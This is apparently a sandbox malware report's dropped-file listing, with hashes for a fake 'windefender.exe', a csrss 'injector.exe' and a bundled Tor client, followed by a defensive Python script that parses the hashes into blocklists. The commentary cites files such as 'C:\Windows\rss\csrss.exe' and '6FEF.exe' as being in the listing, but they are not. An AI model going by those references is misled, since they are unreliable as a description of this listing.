C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7e00b0c35233794af15148d463815bec
SHA1 d8cee4abcc48d649d103345e4526b3c6fdf03178
SHA256 9e1c6d4262a26af1582583523b00e275b661df50a81f7ea967f7b60f4545d58c
SHA512 04d3b2578827b7cd15c491a71a7145e7bb54263c40de9b4703895e1dbe65ce756e067c1b756e9e05bc2a36ef68d1ba1205bf04e32b8ba7f2ccaa5b44faf85f69

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

C:\Users\Admin\AppData\Local\Temp\8DE5.exe

MD5 e519e00feb6e0534ba2154b9e865c184
SHA1 f4f4980c16a9aaa7c331811be95dd9900f5a09b9
SHA256 d694d11e2ced3fdd0ce34ab097ac2dc50db3e3ce026d65426a37b294ea4b90eb
SHA512 a86d68795f0c774b2aef7ad4e4b90f21d67757255d171ff2bea753381aabd040f63048cda43ea852827c5b01da83ffa0b1236667b991d331710b9526106fd4ef

C:\Windows\windefender.exe

MD5 438fd3bcbc8794dcc50fb770b7bbc271
SHA1 f9242a03498fcd58766079919fc07c2d12aacef2
SHA256 c66c679eeedf575beeed45e9968c231c74eac6404ea945dff4abfa8852ec6841
SHA512 5fd76745ecc510697a0405fbf79960b36042a88096f97d5fb6e99fe5abf168b3af073d9ba88273b0f4087bcc313aee625b93261d189ce72af21583bf2f08edd4

C:\Windows\windefender.exe

MD5 b5041f6d6e06f6ef2c9a57b7f71bd754
SHA1 ebd4fbce7add1fc506fe8acfd3a16754dadd067d
SHA256 1d0db51ce2bf3a8d6c51bc2a912e8085fb32f4b7776057243f9bc868a4d71199
SHA512 2863415208e05e54459ef4711fa83f4c636384887ace921f0039ad5f4c9ab14488032c5c96070f906839c74ce148c78ed4a3a503821fd37d0aa84222c48a7c50

C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\libcrypto-1_1.dll

MD5 b7c32c8e7d21aa9b79470037227eba43
SHA1 38d719b10ca035cee65162c1a44e2c62123d41b4
SHA256 99b4042a858a9e437917c8256692e9ba161b87054ccf5e22538e86bb35c34f23
SHA512 d85345380b9605c8484e11873218aa4eaeea573ca51eedada6d0518695a2b184bb22faf7c5e3d88330935774ced17e9d80c577b06603aa1ca6dab748b0bd15a7

C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\libevent-2-1-7.dll

MD5 736443b08b5a52b6958f001e8200be71
SHA1 e56ddc8476aef0d3482c99c5bfaf0f57458b2576
SHA256 da1f75b9ce5f47cb78a6930a50c08397ee4d9778302746340f4057fcd838dbf4
SHA512 9dfcdb1186b089e7961767d427de986ad8e5f7715b7592984349d0b8e7f02198137c83e8c79a096a7475ad9f4695f52539fa08fa65912860ddf0a85515a7cda1

C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\libssp-0.dll

MD5 7cdbaca31739500aefc06dd85a8558ff
SHA1 adc36ec6a3cdc7e57a1b706c820e382627f6cb90
SHA256 0a1dee5dd5234971f7526f3d5f8b7e2cfdcb536e18debd51c985010fb504fbdb
SHA512 6df8ac9054f27ebbef9642ce79ff7ba836411ea0ed0bd04b3cfe724a336a91f665c2cc0b7a4bfc99a80786d1a6d361b971a7dbb7a298b919a1baa812541841ba

C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe

MD5 16f6d83195f39bda25fef182fd1ac5c4
SHA1 cb8d57181bf338c1e36f8baba92d7453569f58b1
SHA256 e35a3356b6c1565c842ceb03a311da29740a036894c42bee0d23efd5563a9cb5
SHA512 fd04fa2f660601a70555719feb8598c33bce0c882957079f4723908c6ce90613b4b6ce9e38ba0565e6c2479acfce4bef91a587a2fc632f2e84b65587abe2fa3a

C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe

MD5 58edee3c1e45c722f305f465e4d2d257
SHA1 fb299dcd6d7da4383b5cad4f232f9b27695c6299
SHA256 4f750d3088bbccb4822a84384092d85d605c8b3adc09b5f6245f4485a9ebf786
SHA512 22a0ebaf2bbc9099cdc8305642106785663b7c9ed7867dca171536f6ac92ebee90c4bcf01ebe9c59b493bdbe9d2bb324f9ccb22c343729ed55ad8fedd8ccc91d

C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\cached-microdesc-consensus.tmp

MD5 fd6962e009deecea212d5b1fc87f0b05
SHA1 4e81c663018c08624c1f8db07fe115b19d1323ce
SHA256 40f2a6e756e24334222220a2b38cf7124a97d8af031bf5232fe8f5e4322d2220
SHA512 c72533565dece8cd70a88ca1d0460fd1ccebb7c4ebd75a0e1b57bc9f601926aac3330eb076bd319b052eede641a37b46db3e8d39d0e2d51488b23f37bf5aa88b
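Two patterns in the listing above are worth pulling out mechanically rather than by eye: the same path listed with two different digests, meaning the file's content changed during the run (C:\Windows\rss\csrss.exe, C:\Windows\windefender.exe, the tor.exe and latestX.exe drops, 6697.exe), and the same digests listed under two paths, meaning one payload was copied to a second location (6FEF.exe and C:\Users\Admin\AppData\Roaming\Tags\Settings.exe carry identical hashes). The Python script below is an added example, not part of this report or of any sandbox's own tooling: it parses the path / MD5 / SHA1 / SHA256 / SHA512 blocks and the memory/<pid>-<n>-<start>-<end>-memory.dmp lines, drops verbatim repeats, validates digest lengths, and cross-references SHA256 values to surface exactly those rewrites and copies. SAMPLE is a constructed excerpt of the entries above, trimmed to MD5/SHA1/SHA256; the strict line grammar and the digest-length check are the example's own assumptions about the format.

```python
"""Parse the 'Files' listing of a sandbox report and cross-reference its hashes.

Added example: the line grammar below is an assumption about the report format
(path line, blank, one 'ALGO hexdigest' line per algorithm, memory/... dump lines).
"""
import re
from collections import defaultdict

# Expected hex-digest lengths; a mismatch usually means a truncated copy/paste.
DIGEST_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
PATH_RE = re.compile(r"^[A-Za-z]:\\")
HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")
DUMP_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")

# Constructed excerpt of the listing above (real paths and digests from this
# report, trimmed to MD5/SHA1/SHA256 and six entries plus three dump lines).
SAMPLE = r"""
C:\Users\Admin\AppData\Local\Temp\6FEF.exe

MD5 73ae6c3b85c619aa3fb06de545597251
SHA1 eb1aebe3b76ca3a2b5075880a307c7da2a7d4526
SHA256 622b9f4f5d1eb80a8d6c0384d4c2cc62db85499005cbc5efb35e0fd343db7427

memory/1484-187-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6FEF.exe

MD5 73ae6c3b85c619aa3fb06de545597251
SHA1 eb1aebe3b76ca3a2b5075880a307c7da2a7d4526
SHA256 622b9f4f5d1eb80a8d6c0384d4c2cc62db85499005cbc5efb35e0fd343db7427

C:\Users\Admin\AppData\Roaming\Tags\Settings.exe

MD5 73ae6c3b85c619aa3fb06de545597251
SHA1 eb1aebe3b76ca3a2b5075880a307c7da2a7d4526
SHA256 622b9f4f5d1eb80a8d6c0384d4c2cc62db85499005cbc5efb35e0fd343db7427

C:\Windows\rss\csrss.exe

MD5 15ccfec965d35354a2142fac5324dcb3
SHA1 4147dc51f89f068e1dd86746e00cb6e6f2a3fc4f
SHA256 4b275ec3c098c462846995c7281e90284059904e5494ce9b8cfd21571978198b

C:\Windows\rss\csrss.exe

MD5 5ede9444cd75f9459b2e9b342459f505
SHA1 ff1ba9423b3eb54a92acf4b70ec5e8d4f7d26627
SHA256 339ab9ea5338eec72519fa58ec8bb6733d25eff99e496031e1b1ddef936384c2

C:\Users\Admin\AppData\Local\Temp\4C94.exe

MD5 f6079a0d6e9c3d6c80af8adb5033b007
SHA1 c111e23c945fc86bf81729112ba1c0acdab479a0
SHA256 fed9fe7c0027acbfeb05ae652b70d981ed3aabb54559eb6bfb1ba24a27e1c3a7

memory/3556-211-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp

memory/3556-212-0x000002ABEA8A0000-0x000002ABEA981000-memory.dmp
"""


def parse_listing(text):
    """Return (entries, dumps).

    entries: [{"path": str, "hashes": {algo: hexdigest}}] in report order, verbatim
             repeats included so the caller can see them.
    dumps:   [(pid, index, start_addr, end_addr)] from the memory/... lines.
    """
    entries, dumps, current = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if PATH_RE.match(line):                      # a new dropped-file block starts
            current = {"path": line, "hashes": {}}
            entries.append(current)
            continue
        m = DUMP_RE.match(line)
        if m:                                        # memory dump reference, keyed by PID
            pid, idx, start, end = m.groups()
            dumps.append((int(pid), int(idx), int(start, 16), int(end, 16)))
            current = None
            continue
        m = HASH_RE.match(line)
        if m:
            algo, digest = m.group(1), m.group(2).lower()
            if current is None:
                raise ValueError(f"hash line with no preceding path: {line}")
            if len(digest) != DIGEST_LEN[algo]:      # catch truncated digests early
                raise ValueError(f"{algo} digest has wrong length for {current['path']}")
            current["hashes"][algo] = digest
            continue
        raise ValueError(f"unrecognised line: {line}")
    return entries, dumps


def dedupe(entries):
    """Drop verbatim repeats: same path and same SHA256."""
    seen, unique = set(), []
    for e in entries:
        key = (e["path"], e["hashes"].get("SHA256"))
        if key not in seen:
            seen.add(key)
            unique.append(e)
    return unique


def overwritten_paths(entries):
    """Paths carrying more than one distinct SHA256: the file's content changed during the run."""
    by_path = defaultdict(list)
    for e in dedupe(entries):
        sha = e["hashes"].get("SHA256")
        if sha and sha not in by_path[e["path"]]:
            by_path[e["path"]].append(sha)
    return {p: shas for p, shas in by_path.items() if len(shas) > 1}


def copies(entries):
    """SHA256 values seen under more than one path: one payload copied or renamed."""
    by_sha = defaultdict(list)
    for e in dedupe(entries):
        sha = e["hashes"].get("SHA256")
        if sha and e["path"] not in by_sha[sha]:
            by_sha[sha].append(e["path"])
    return {s: paths for s, paths in by_sha.items() if len(paths) > 1}


def sha256_iocs(entries):
    """Sorted, de-duplicated SHA256 list suitable for a blocklist or hunt query."""
    return sorted({e["hashes"]["SHA256"] for e in entries if "SHA256" in e["hashes"]})


def dumps_per_pid(dumps):
    """How many memory dumps the sandbox took per PID (ties back to the Processes section)."""
    counts = defaultdict(int)
    for pid, *_ in dumps:
        counts[pid] += 1
    return dict(counts)


if __name__ == "__main__":
    entries, dumps = parse_listing(SAMPLE)
    print(f"{len(entries)} entries, {len(dedupe(entries))} unique, "
          f"{len(sha256_iocs(entries))} distinct SHA256")
    for path, shas in overwritten_paths(entries).items():
        print("rewritten:", path, "->", ", ".join(s[:12] for s in shas))
    for sha, paths in copies(entries).items():
        print("copied:", sha[:12], "->", " | ".join(paths))
    print("memory dumps per PID:", dumps_per_pid(dumps))
```

To run it over the whole section, paste the listing into a file and pass its contents to parse_listing instead of SAMPLE; any line that is not a path, a digest or a memory-dump reference raises, which is deliberate, since a silently skipped line is how an IOC goes missing from a blocklist.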